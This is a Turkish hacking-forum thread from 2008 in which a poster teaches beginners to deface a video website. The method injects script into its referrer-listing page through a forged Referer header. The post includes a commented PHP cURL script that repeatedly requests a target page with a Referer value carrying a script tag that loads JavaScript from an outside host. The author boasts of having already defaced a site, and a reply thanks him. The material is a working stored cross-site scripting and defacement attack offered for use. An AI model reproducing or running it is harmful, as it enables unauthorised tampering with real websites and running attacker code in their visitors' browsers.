KingTurk-Team


 
AnasayfaKayıt OlGiriş yap

 

WebSitede Acik Bulma

Önceki başlık Sonraki başlık Aşağa gitmek 
Yazar Mesaj
KingTurk Team
KingTurk Team
avatar
Yaş :
Kayıt tarihi : 15/08/08
Mesaj Sayısı : 198
Nerden :

MesajKonu: WebSitede Acik Bulma   C.tesi Ağus. 16, 2008 1:57 pm

Evet arkadaşlar şimdi sizlere bi sitede açık nasıl bulunur bunu anlatıcam yani anlatmaya çalışıcağım şey web sitelerinde açık bulma.

Belki tabir biraz yanlış oldu kabul ediyorum ama işe yeni başlıyan kişilerin dikkatini ancak bu şekilde çekebiliceğimden dolayı bu tür bi başlık seçtim şimdi kendimize bi hedef site seçelim benim hedef sitem www.örnek.com (Buradan sonrası her sitede değişir ben sadece sizlere bir örnek verebilmek mantığı kavratabilmek amacıyla seçtim bu siteyi) Ben bu sitenin yetkililerine çok ulaşmaya çalıştım ama kendileri bir türlü cevap vermeyince uyarı indexi atmaktan başka çarem kalmadı şimdi ilk önce siteye bi girelim.

www.örnek.com girdik etrafta bir sürü video var herhangi birini seçelim misal http://www.örnek.com/v-drcl3aj/yaman---idare-edemem-mugla-universitesi bu video çok saçma ben redLine olarak bu videoyu çekenlerin aklından şüphe ederim şimdi bakalım burada neler yapabiliriz. hımm altta yorumlar kısmı var ama artık hiç bir web sitesi neredeyse yorumlarda html kullanımına izin vermiyor doğal olarak orayı direk geçiyorum bakalım sayfayı deface etmek için başka neler kullanabiliriz hımm orada gördüğünüz gibi linkler diye bi buton var tıklayınca ziyaretçilerin geldiği siteleri gösteriyor. Şimdi basit bi mantık kuralım Ben örneğin bu konuya o videonun linkini yazdım ve biri o videoyu tıkladı ve videoya girdi doğal olarak linkler kısmında http://www.tith4ck.net/default.aspx?g=posts&t=5030 tarzında bişey yazıcak peki ben burada html kullanabilirmiyim? şimdi orada html kullanabilmek için ya http://<script>alert('hacked');</script>.com tarzında bi domainimin olması gerekli yada benim sahte bi referrer bilgisi göndermem gerekli. o şekilde bi domainim olamıyacağına göre benim yapabiliceğim en mantıklı şey oraya sahte bi refferer göndermektir bunu nasıl yaparım belki araştırırsanız bir kaç program bulabilirsiniz ama ben php ile yapmayı tercih ederim. (Gördüğünüz gibi bi site hacklemek için illa arada dil bilmek gerekiyor) şimdi nasıl bi kod hazırlamam gerekli onu aşşağıda açıklamasıyla beraber verdim.


Kod:
<?php //php başlangıcı
set_time_limit(0); //Burada time out olmayı engelliyoruz
for($i=1;$i<55;$i++) {//Burada Sayfaya kaç kere girilmesini istediğimizi yazıyoruz.
$ch = curl_init();//bağlantı başlangıcı
$url = "http://www.örnek.com/v-drcl3aj/yaman---idare-edemem-mugla-universitesi";//Girilicek Sayfa
$ref = '"><script src=http://www.tith4ck.net/jupla/c.js></script>';//referer olarak gösterilecek sayfa
curl_setopt($ch,CURLOPT_REFERER, $ref);//refererimizi bağlantıya tanıttık
curl_setopt($ch,CURLOPT_URL,$url);//urlyi bağlantıya tanıttık
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);//transfere devam et
curl_setopt($ch,CURLOPT_POST,1);// web sitesine girmesini söyledik
$xhtml = curl_exec($ch);//bağlantı ayarlarımız tamam olduğunu belirttik
echo"Tıklanma - $i <br />";// Ekrana kaç kere girdiğimizi yazıyoruz
if (curl_errno($ch)) {//hatanın olup olmadığını kontrol ettiriyoruz
print curl_error($ch);//hata varsa hatayı yazdırıyoruz
} else {// hata yoksa
curl_close($ch);//bağlantıyı kapatıyoruz
}
}

//php bitti
?>




Yukarda açıklamaları okuduysanız az çok anlamışsınızdır kodun amacını. Kodun amacı siteye sizin istediğiniz refereri girmektir ister google yaparsınız istersenizde benim kulandığım gibi html kullanırsınız zevk size kalmış burada anlatmaya çalıştığım sadece mantıkdı. Her sitede böyle açık olucak diye bişey yok ben sadece açığın mantığını paylaştım sizlerle alternatif çözümler üretmenin sizin hayallerinizle sınırlı olduğunu anlatmaya çalıştım
Sayfa başına dön Aşağa gitmek
Kullanıcı profilini gör
KingTurk Team
KingTurk Team
avatar
Yaş : 24
Kayıt tarihi : 15/08/08
Mesaj Sayısı : 20
Nerden : MaNiSa

MesajKonu: Geri: WebSitede Acik Bulma   Paz Ağus. 17, 2008 10:42 am

Saol mesut işime yarar bu
Sayfa başına dön Aşağa gitmek
Kullanıcı profilini gör

WebSitede Acik Bulma

Önceki başlık Sonraki başlık Sayfa başına dön 
1 sayfadaki 1 sayfası

Bu forumun müsaadesi var: Bu forumdaki mesajlara cevap veremezsiniz
KingTurk-Team :: HackS :: Web Hacking -